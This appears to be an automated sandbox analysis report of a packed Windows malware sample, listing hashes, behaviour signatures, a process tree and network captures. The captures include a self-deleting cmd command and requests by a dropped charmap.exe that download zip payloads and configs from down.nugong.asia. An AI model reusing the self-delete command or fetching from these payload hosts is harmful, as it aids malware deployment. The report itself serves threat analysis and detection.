Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20231020-en
  • resource tags

    arch:x64arch:x86image:win7-20231020-enlocale:en-usos:windows7-x64system
  • submitted
    16/11/2023, 12:03 UTC

General

  • Target

    aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe

  • Size

    2.0MB

  • MD5

    2f3353e9de4535e858254b2f9ebe0e70

  • SHA1

    beb0fe2c7a977abf0f292477466be291fca80a9a

  • SHA256

    aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00

  • SHA512

    909bb4cd1108fefed5bdf68af29eb0fbc5584f6c9ce7b7a15790af2c24ac2898ab132e7e95b7ba636c131c645e8aee95ef749dc24f7f05c2eb3808ab6c2146d7

  • SSDEEP

    49152:8Us4vWvQznXPwh11sXIAyT9tN93ul/lDxqqqoqqqdT:ls4iKXPs1sByTNT

Score
10/10
upx

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 3 IoCs
  • Deletes itself 1 IoCs
  • Executes dropped EXE 2 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Unexpected DNS network traffic destination 1 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Drops file in System32 directory 13 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 1 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: LoadsDriver 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 12 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:420
      • C:\ProgramData\autofmt.exe
        "C:\ProgramData\autofmt.exe"
        2⤵
        • Executes dropped EXE
        PID:2688
      • C:\charmap.exe
        "C:\charmap.exe"
        2⤵
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Drops file in System32 directory
        • Drops file in Windows directory
        • Modifies data under HKEY_USERS
        • Modifies system certificate store
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2788
    • C:\Windows\Explorer.EXE
      C:\Windows\Explorer.EXE
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1304
      • C:\Users\Admin\AppData\Local\Temp\aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe
        "C:\Users\Admin\AppData\Local\Temp\aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe"
        2⤵
        • Modifies system certificate store
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2512
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c timeout /t 1 & del /Q /F "C:\Users\Admin\AppData\Local\Temp\aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe"
          3⤵
          • Deletes itself
          • Suspicious use of WriteProcessMemory
          PID:692
          • C:\Windows\SysWOW64\timeout.exe
            timeout /t 1
            4⤵
            • Delays execution with timeout.exe
            PID:2880

    Network

    • flag-us
      DNS
      54e03c235962947852b3fe22714547f2.vbnm34567.xyz
      aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe
      Remote address:
      8.8.8.8:53
      Request
      54e03c235962947852b3fe22714547f2.vbnm34567.xyz
      IN A
      Response
    • flag-us
      DNS
      54e03c235962947852b3fe22714547f2.vbnm34567.xyz
      aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe
      Remote address:
      8.8.8.8:53
      Request
      54e03c235962947852b3fe22714547f2.vbnm34567.xyz
      IN A
      Response
    • flag-us
      DNS
      down.nugong.asia
      aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe
      Remote address:
      114.114.114.114:53
      Request
      down.nugong.asia
      IN A
      Response
      down.nugong.asia
      IN CNAME
      down.nugong.asia.cdn.dnsv1.com.cn
      down.nugong.asia.cdn.dnsv1.com.cn
      IN CNAME
      ofgk41rd.slt.sched.tdnsv8.com
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      119.167.229.212
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      123.12.213.220
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      123.12.213.243
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      211.93.212.232
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      218.29.50.234
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      221.15.67.145
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      36.248.54.85
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      123.12.213.187
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      118.212.235.109
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      58.144.226.248
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      110.249.196.101
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      118.212.235.102
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      42.56.81.104
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      118.212.235.231
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      42.231.136.215
    • flag-cn
      GET
      http://down.nugong.asia/cfg/cmc/ping.txt
      charmap.exe
      Remote address:
      119.167.229.212:80
      Request
      GET /cfg/cmc/ping.txt HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Wed, 02 Nov 2022 09:53:56 GMT
      Etag: "bdf198e2733b39eae21f211114395f67"
      Content-Type: text/plain
      Date: Thu, 14 Sep 2023 14:23:31 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 3269775211629437622
      x-cos-meta-md5: bdf198e2733b39eae21f211114395f67
      x-cos-request-id: NjUwMzE3NjNfYTRmN2QxZV8yY2Q3M19mYzMzYTM=
      Content-Length: 16
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 7129195975271880907
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-cn
      GET
      http://down.nugong.asia/cfg/cmc/ping.txt
      charmap.exe
      Remote address:
      119.167.229.212:80
      Request
      GET /cfg/cmc/ping.txt HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Wed, 02 Nov 2022 09:53:56 GMT
      Etag: "bdf198e2733b39eae21f211114395f67"
      Content-Type: text/plain
      Date: Thu, 14 Sep 2023 14:23:31 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 3269775211629437622
      x-cos-meta-md5: bdf198e2733b39eae21f211114395f67
      x-cos-request-id: NjUwMzE3NjNfYTRmN2QxZV8yY2Q3M19mYzMzYTM=
      Content-Length: 16
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 7041402496685730997
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-cn
      GET
      http://down.nugong.asia/cfg/cmc/userchange.txt
      charmap.exe
      Remote address:
      119.167.229.212:80
      Request
      GET /cfg/cmc/userchange.txt HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Tue, 10 Oct 2023 09:19:13 GMT
      Etag: "fc45e837e3ce86dbec3d2c37cf4902de"
      Content-Type: text/plain
      Date: Tue, 10 Oct 2023 09:20:23 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 12006462995938776668
      x-cos-request-id: NjUyNTE3NTdfNGYyZmIwMDlfZWY3ZV82NGJlNTU2
      Content-Length: 80
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 1752883517681810299
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-cn
      GET
      http://down.nugong.asia/cfg/cmc/userpq.zip
      charmap.exe
      Remote address:
      119.167.229.212:80
      Request
      GET /cfg/cmc/userpq.zip HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Sun, 15 Oct 2023 12:14:07 GMT
      Etag: "adc490d0b07f1be911590c5b795aebea"
      Content-Type: application/zip
      Date: Sun, 15 Oct 2023 12:15:13 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 2623325120400499928
      x-cos-request-id: NjUyYmQ3ZDFfNjNlZjk4MWVfMTM2MGFfNDFmMzk2ZA==
      Content-Length: 14048
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 5713177746948184236
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-cn
      GET
      http://down.nugong.asia/cfg/cmc/blacklist.txt
      charmap.exe
      Remote address:
      119.167.229.212:80
      Request
      GET /cfg/cmc/blacklist.txt HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Tue, 14 Nov 2023 10:01:12 GMT
      Etag: "634229b217016f7ddbec9e50e2b2215a"
      Content-Type: text/plain
      Date: Tue, 14 Nov 2023 10:02:22 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 10822492973310145922
      x-cos-request-id: NjU1MzQ1YWVfZWM0Y2JlMDlfYzBhY182ZDkxNjY1
      Content-Length: 14128
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 11368800093448790513
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-cn
      GET
      http://down.nugong.asia/cfg/user/c995ec7fd4f57c0d/a8f5d6fe5664609d.json
      charmap.exe
      Remote address:
      119.167.229.212:80
      Request
      GET /cfg/user/c995ec7fd4f57c0d/a8f5d6fe5664609d.json HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Mon, 13 Nov 2023 05:36:53 GMT
      Etag: "20b0141db067e42fab5d126b516ce8fc"
      Content-Type: application/json
      Date: Mon, 13 Nov 2023 05:39:43 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 6759049951230011836
      x-cos-request-id: NjU1MWI2OWZfZDk5M2M1MDlfZDRkYl82YWU4ODgx
      Content-Length: 5536
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 11897375171845853590
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-cn
      GET
      http://down.nugong.asia/cfg/pub/ms.json
      charmap.exe
      Remote address:
      119.167.229.212:80
      Request
      GET /cfg/pub/ms.json HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Thu, 16 Nov 2023 11:55:58 GMT
      Etag: "90c471dc2bc4708513d3942620d62b50"
      Content-Type: application/json
      Date: Thu, 16 Nov 2023 11:58:51 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 85938580248757588
      x-cos-request-id: NjU1NjAzZmFfNjhlZTk4MWVfYjA4Y183N2JmY2Zl
      Content-Length: 70816
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 7949643104443966097
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-cn
      GET
      http://down.nugong.asia/cfg/pub/ps.json
      charmap.exe
      Remote address:
      119.167.229.212:80
      Request
      GET /cfg/pub/ps.json HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Thu, 16 Nov 2023 11:55:58 GMT
      Etag: "da98b3f975d47ac8f8c82c818e2918f0"
      Content-Type: application/json
      Date: Thu, 16 Nov 2023 11:58:56 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 17045325299171296767
      x-cos-request-id: NjU1NjA0MDBfYzMyNjgwOV8xMTZjXzk1OTU0OWE=
      Content-Length: 14496
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 16963553139638466009
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-cn
      GET
      http://down.nugong.asia/pgm/mds/186dc678628340ee/90a22928787e3b5a341729d845ab26d5f93b9db0120714d864.zip
      charmap.exe
      Remote address:
      119.167.229.212:80
      Request
      GET /pgm/mds/186dc678628340ee/90a22928787e3b5a341729d845ab26d5f93b9db0120714d864.zip HTTP/1.1
      Host: down.nugong.asia
      User-Agent: CHM_MSDN
      Response
      HTTP/1.1 200 OK
      Last-Modified: Mon, 13 Nov 2023 05:36:32 GMT
      Etag: "a84b646b1d930ce01381ef358a7553eb"
      Content-Type: application/zip
      Date: Mon, 13 Nov 2023 05:37:42 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 15716088766820099200
      x-cos-request-id: NjU1MWI2MjZfNjMyNjgwOV8yZjdiXzcyNjM4ZWE=
      Content-Length: 776248
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 500760231856281183
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-cn
      GET
      http://down.nugong.asia/pgm/mds/05631e93ccdb00ee/945f98f10df53a8f1cfb3848c371d6e3829473480dc6631564.zip
      charmap.exe
      Remote address:
      119.167.229.212:80
      Request
      GET /pgm/mds/05631e93ccdb00ee/945f98f10df53a8f1cfb3848c371d6e3829473480dc6631564.zip HTTP/1.1
      Host: down.nugong.asia
      User-Agent: CHM_MSDN
      Response
      HTTP/1.1 200 OK
      Last-Modified: Mon, 25 Sep 2023 10:33:25 GMT
      Etag: "8cea813a8866e2b77e93c2a847204979"
      Content-Type: application/zip
      Date: Sat, 21 Oct 2023 09:04:02 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 5924644156334808127
      x-cos-request-id: NjUzMzk0MDJfNWJlZDk4MWVfYmVkOV80Y2M2YjJi
      Content-Length: 553108
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 17693798271994959229
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-cn
      GET
      http://down.nugong.asia/pgm/mds/006866ef1b75dc55/30d51089d778d32a4d22077fb983ba81fd82d4cf417ac62464.zip
      charmap.exe
      Remote address:
      119.167.229.212:80
      Request
      GET /pgm/mds/006866ef1b75dc55/30d51089d778d32a4d22077fb983ba81fd82d4cf417ac62464.zip HTTP/1.1
      Host: down.nugong.asia
      User-Agent: CHM_MSDN
      Response
      HTTP/1.1 200 OK
      Last-Modified: Fri, 18 Aug 2023 07:39:30 GMT
      Etag: "d3ee55c63ac9cfa7fd408553f9369f5b"
      Content-Type: application/zip
      Date: Fri, 18 Aug 2023 07:42:38 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 11311802544265698830
      x-cos-request-id: NjRkZjIwZWVfNTY1N2JiMDlfOGQ0Nl8zNGUyMDQ3
      Content-Length: 902517
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 1174372281419468057
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-cn
      GET
      http://down.nugong.asia/cfg/cmc/Lander.txt
      charmap.exe
      Remote address:
      119.167.229.212:80
      Request
      GET /cfg/cmc/Lander.txt HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Thu, 02 Nov 2023 08:54:14 GMT
      Etag: "2b0a274c713e2dbc2e5cbaeb685b7cb9"
      Content-Type: text/plain
      Date: Thu, 02 Nov 2023 08:57:25 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 5524331398157289202
      x-cos-request-id: NjU0MzY0NzVfY2E5ZjA4MDlfMWVjYV82MDE2NWI1
      Content-Length: 25440
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 12967380852860782898
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-cn
      GET
      http://down.nugong.asia/cfg/cmc/psexe.txt
      charmap.exe
      Remote address:
      119.167.229.212:80
      Request
      GET /cfg/cmc/psexe.txt HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Thu, 16 Nov 2023 10:21:48 GMT
      Etag: "bbf519b79b44c56a5e57f25e7c9c2b09"
      Content-Type: text/plain
      Date: Thu, 16 Nov 2023 10:22:59 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 3618226480165307532
      x-cos-request-id: NjU1NWVkODNfYTMzMjY4MDlfZTNlNl83NGY0NzVl
      Content-Length: 17552
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 13708709213316926661
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-cn
      GET
      http://down.nugong.asia/cfg/cmc/urlmd5.json
      charmap.exe
      Remote address:
      119.167.229.212:80
      Request
      GET /cfg/cmc/urlmd5.json HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Thu, 16 Nov 2023 11:59:51 GMT
      Etag: "af00c53c210fdf6c89a35e31fab90718"
      Content-Type: application/json
      Date: Thu, 16 Nov 2023 12:02:58 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 17454991016677689058
      x-cos-request-id: NjU1NjA0ZjJfNzljZDExMGJfMmYzNzhfZTM1MzcxZA==
      Content-Length: 656
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 7984560787863337585
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-us
      DNS
      apps.game.qq.com
      charmap.exe
      Remote address:
      8.8.8.8:53
      Request
      apps.game.qq.com
      IN A
      Response
      apps.game.qq.com
      IN A
      101.227.134.49
      apps.game.qq.com
      IN A
      101.227.134.27
    • flag-cn
      GET
      https://apps.game.qq.com/comm-htdocs/ip/get_ip.php
      charmap.exe
      Remote address:
      101.227.134.49:443
      Request
      GET /comm-htdocs/ip/get_ip.php HTTP/1.1
      Accept-Encoding: gzip, deflate
      Host: apps.game.qq.com
      Connection: Close
      Response
      HTTP/1.1 200 OK
      Date: Thu, 16 Nov 2023 12:03:31 GMT
      Content-Type: text/html
      Content-Length: 49
      Connection: close
      Server: swoole-http-server
      Content-Encoding: gzip
    • flag-us
      DNS
      ocsp.trust-provider.cn
      aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe
      Remote address:
      8.8.8.8:53
      Request
      ocsp.trust-provider.cn
      IN A
      Response
      ocsp.trust-provider.cn
      IN CNAME
      ocsp.trust-provider.cn.c.vedcdnlb.com
      ocsp.trust-provider.cn.c.vedcdnlb.com
      IN CNAME
      bd-l7-online-tob-oversea-opt.s.vedsalb.com
      bd-l7-online-tob-oversea-opt.s.vedsalb.com
      IN A
      36.143.236.7
      bd-l7-online-tob-oversea-opt.s.vedsalb.com
      IN A
      36.248.38.100
      bd-l7-online-tob-oversea-opt.s.vedsalb.com
      IN A
      111.13.153.152
      bd-l7-online-tob-oversea-opt.s.vedsalb.com
      IN A
      111.48.138.18
      bd-l7-online-tob-oversea-opt.s.vedsalb.com
      IN A
      111.206.23.199
      bd-l7-online-tob-oversea-opt.s.vedsalb.com
      IN A
      112.50.95.96
      bd-l7-online-tob-oversea-opt.s.vedsalb.com
      IN A
      117.27.246.96
      bd-l7-online-tob-oversea-opt.s.vedsalb.com
      IN A
      119.36.90.164
    • flag-cn
      GET
      http://ocsp.trust-provider.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTRK6%2BKMEm7xEAA7oRlXypSzGx%2FAgQUyPPFCRszol%2BmEquQ1gC2XPyNHAYCEFeRTDpozwT3OxvpMIocpu0%3D
      aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe
      Remote address:
      36.143.236.7:80
      Request
      GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTRK6%2BKMEm7xEAA7oRlXypSzGx%2FAgQUyPPFCRszol%2BmEquQ1gC2XPyNHAYCEFeRTDpozwT3OxvpMIocpu0%3D HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      User-Agent: Microsoft-CryptoAPI/6.1
      Host: ocsp.trust-provider.cn
      Response
      HTTP/1.1 200 OK
      Server: volc-dcdn
      Content-Type: application/ocsp-response
      Content-Length: 599
      Connection: keep-alive
      Date: Thu, 16 Nov 2023 12:03:31 GMT
      Age: 1
      CF-Cache-Status: EXPIRED
      CF-RAY: 826669fd7cf5ce8c-SJC
      ETag: "5f2fef2f2105260951d9c24345a955796b1fd5d7"
      Expires: Wed, 22 Nov 2023 09:19:05 GMT
      Last-Modified: Wed, 15 Nov 2023 09:19:06 GMT
      WS-Cache-Status: 0
      X-CCACDN-Proxy-ID: scdpinlb4
      X-Frame-Options: SAMEORIGIN
      X-Via: 1.1 PS-CZX-01YIQ141:4 (Cdn Cache Server V2.0), 1.1 PS-PEK-01GFt24:12 (Cdn Cache Server V2.0)
      X-Ws-Request-Id: 655603c5_PS-PEK-01GFt24_25725-26234
      cache-via: cache.n173-145-133.bdcdn-hbcdcm02
      x-request-ip: 154.61.71.13
      x-tt-trace-tag: id=5
      x-dsa-trace-id: 17001362117a57cebda9528039b01ac55e0e39b8e3
      X-Bdsa-Cache-Status: HIT
      Cache-Via-Status: cache.n173-145-133.bdcdn-hbcdcm02(HIT)
      X-Bdsa-Cache-Tm: 1700135877-3266
      Accept-Ranges: bytes
      via: n173-145-133.bdcdn-hbcdcm02.ToB
      X-Dsa-Origin-Status: 200
      server-timing: cdn-cache;desc=HIT, origin;dur=0, edge;dur=0
    • flag-us
      DNS
      ocsp.digicert.cn
      charmap.exe
      Remote address:
      8.8.8.8:53
      Request
      ocsp.digicert.cn
      IN A
      Response
      ocsp.digicert.cn
      IN CNAME
      ocsp.digicert.cn.w.cdngslb.com
      ocsp.digicert.cn.w.cdngslb.com
      IN A
      47.246.48.205
    • flag-nl
      GET
      http://ocsp.digicert.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAbJNRrm8KxusAb7DCqnMkE%3D
      charmap.exe
      Remote address:
      47.246.48.205:80
      Request
      GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAbJNRrm8KxusAb7DCqnMkE%3D HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      User-Agent: Microsoft-CryptoAPI/6.1
      Host: ocsp.digicert.cn
      Response
      HTTP/1.1 200 OK
      Server: Tengine
      Content-Type: application/ocsp-response
      Content-Length: 471
      Connection: keep-alive
      Cache-Control: max-age=7200
      Date: Thu, 16 Nov 2023 11:43:02 GMT
      Ali-Swift-Global-Savetime: 1700134982
      Via: cache2.l2de2[0,0,200-0,H], cache12.l2de2[0,0], cache5.nl2[0,0,200-0,H], cache7.nl2[1,0]
      Age: 1229
      X-Cache: HIT TCP_MEM_HIT dirn:1:348365936
      X-Swift-SaveTime: Thu, 16 Nov 2023 11:43:02 GMT
      X-Swift-CacheTime: 3600
      Timing-Allow-Origin: *
      EagleId: 2ff6309b17001362112167865e
    • flag-nl
      GET
      http://ocsp.digicert.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQhnxEBNL9LgIhfSsTcHsrTt204QgQURNnISjOO01KNp5KUYR%2BayKW37MsCEAlZRMywkYGXHkcMpMgpr8c%3D
      charmap.exe
      Remote address:
      47.246.48.205:80
      Request
      GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQhnxEBNL9LgIhfSsTcHsrTt204QgQURNnISjOO01KNp5KUYR%2BayKW37MsCEAlZRMywkYGXHkcMpMgpr8c%3D HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      User-Agent: Microsoft-CryptoAPI/6.1
      Host: ocsp.digicert.cn
      Response
      HTTP/1.1 200 OK
      Server: Tengine
      Content-Type: application/ocsp-response
      Content-Length: 471
      Connection: keep-alive
      Cache-Control: max-age=7200
      Date: Thu, 16 Nov 2023 11:43:25 GMT
      Ali-Swift-Global-Savetime: 1700135005
      Via: cache5.l2de2[14,14,200-0,M], cache4.l2de2[16,0], cache8.nl2[0,0,200-0,H], cache7.nl2[1,0]
      Age: 1206
      X-Cache: HIT TCP_MEM_HIT dirn:1:423183860
      X-Swift-SaveTime: Thu, 16 Nov 2023 11:43:25 GMT
      X-Swift-CacheTime: 3600
      Timing-Allow-Origin: *
      EagleId: 2ff6309b17001362113278050e
    • flag-us
      DNS
      sp1.baidu.com
      charmap.exe
      Remote address:
      8.8.8.8:53
      Request
      sp1.baidu.com
      IN A
      Response
      sp1.baidu.com
      IN CNAME
      www.a.shifen.com
      www.a.shifen.com
      IN CNAME
      www.wshifen.com
      www.wshifen.com
      IN A
      103.235.47.7
      www.wshifen.com
      IN A
      103.235.47.102
      www.wshifen.com
      IN A
      103.235.47.103
      www.wshifen.com
      IN A
      103.235.46.40
    • flag-hk
      GET
      https://sp1.baidu.com/8aQDcjqpAAV3otqbppnN2DJv/api.php?query=154.61.71.13&resource_id=6006&ie=utf8&oe=gbk&format=json
      charmap.exe
      Remote address:
      103.235.47.7:443
      Request
      GET /8aQDcjqpAAV3otqbppnN2DJv/api.php?query=154.61.71.13&resource_id=6006&ie=utf8&oe=gbk&format=json HTTP/1.1
      Accept-Encoding: gzip
      User-Agent: CHM_MSDN
      Host: sp1.baidu.com
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Cache-Control: private
      Content-Length: 354
      Content-Type: application/json;charset=gbk
      Date: Thu, 16 Nov 2023 12:03:47 GMT
      Expires: Thu, 16 Nov 2023 12:03:47 GMT
      P3p: CP=" OTI DSP COR IVA OUR IND COM "
      P3p: CP=" OTI DSP COR IVA OUR IND COM "
      Server: Apache
      Set-Cookie: BAIDUID=39C61BC447B3055DFAFABCC695373CB5:FG=1; expires=Fri, 15-Nov-24 12:03:47 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
      Set-Cookie: BAIDUID=A028277FD5A679FD6E47394ADB1A61E6:FG=1; expires=Fri, 15-Nov-24 12:03:47 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
      Tracecode: 02270995930429029386111620
      Tracecode: 02271004770274315530111620
      X-Powered-By: HHVM
    • flag-us
      DNS
      crl.globalsign.com
      charmap.exe
      Remote address:
      8.8.8.8:53
      Request
      crl.globalsign.com
      IN A
      Response
      crl.globalsign.com
      IN CNAME
      global.prd.cdn.globalsign.com
      global.prd.cdn.globalsign.com
      IN CNAME
      cdn.globalsigncdn.com.cdn.cloudflare.net
      cdn.globalsigncdn.com.cdn.cloudflare.net
      IN A
      104.18.20.226
      cdn.globalsigncdn.com.cdn.cloudflare.net
      IN A
      104.18.21.226
    • flag-us
      GET
      http://crl.globalsign.com/root-r3.crl
      charmap.exe
      Remote address:
      104.18.20.226:80
      Request
      GET /root-r3.crl HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      User-Agent: Microsoft-CryptoAPI/6.1
      Host: crl.globalsign.com
      Response
      HTTP/1.1 200 OK
      Date: Thu, 16 Nov 2023 12:03:42 GMT
      Content-Type: application/pkix-crl
      Content-Length: 2059
      Connection: keep-alive
      Last-Modified: Fri, 20 Oct 2023 00:00:00 GMT
      ETag: 3A
      Expires: Mon, 15 Jan 2024 00:00:00 GMT
      Cache-Control: public, no-transform, must-revalidate, s-maxage=3600
      CF-Cache-Status: HIT
      Age: 3266
      Accept-Ranges: bytes
      Server: cloudflare
      CF-RAY: 826f97a13a976657-AMS
    • flag-us
      GET
      http://ocsp2.globalsign.com/rootr3/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBT1nGh%2FJBjWKnkPdZIzB1bqhelHBwQUj%2FBLf6guRSSuTVD6Y5qL3uLdG7wCDQHuXyId%2FGI71DM6hVc%3D
      charmap.exe
      Remote address:
      104.18.21.226:80
      Request
      GET /rootr3/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBT1nGh%2FJBjWKnkPdZIzB1bqhelHBwQUj%2FBLf6guRSSuTVD6Y5qL3uLdG7wCDQHuXyId%2FGI71DM6hVc%3D HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      User-Agent: Microsoft-CryptoAPI/6.1
      Host: ocsp2.globalsign.com
      Response
      HTTP/1.1 200 OK
      Date: Thu, 16 Nov 2023 12:03:53 GMT
      Content-Type: application/ocsp-response
      Content-Length: 1431
      Connection: keep-alive
      Expires: Mon, 20 Nov 2023 09:48:46 GMT
      ETag: "b87def254cfbd1e1c7bbefdf93d58976a152baa5"
      Last-Modified: Thu, 16 Nov 2023 09:48:47 GMT
      Cache-Control: public, no-transform, must-revalidate, s-maxage=3600
      CF-Cache-Status: HIT
      Age: 2094
      Accept-Ranges: bytes
      Server: cloudflare
      CF-RAY: 826f97e64c3db96f-AMS
    • flag-cn
      GET
      http://down.nugong.asia/pgm/mds/b9aa4771a06003c1/4c3c71ab6fb06a3ec85c07a85e2af9e361998acec86eaa1e64.zip
      charmap.exe
      Remote address:
      119.167.229.212:80
      Request
      GET /pgm/mds/b9aa4771a06003c1/4c3c71ab6fb06a3ec85c07a85e2af9e361998acec86eaa1e64.zip HTTP/1.1
      Host: down.nugong.asia
      User-Agent: CHM_MSDN
      Response
      HTTP/1.1 200 OK
      Last-Modified: Tue, 10 Oct 2023 09:26:47 GMT
      Etag: "2984d7173c0ef353247c5882127b6dea"
      Content-Type: application/zip
      Date: Wed, 18 Oct 2023 02:37:24 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 4837415142414469027
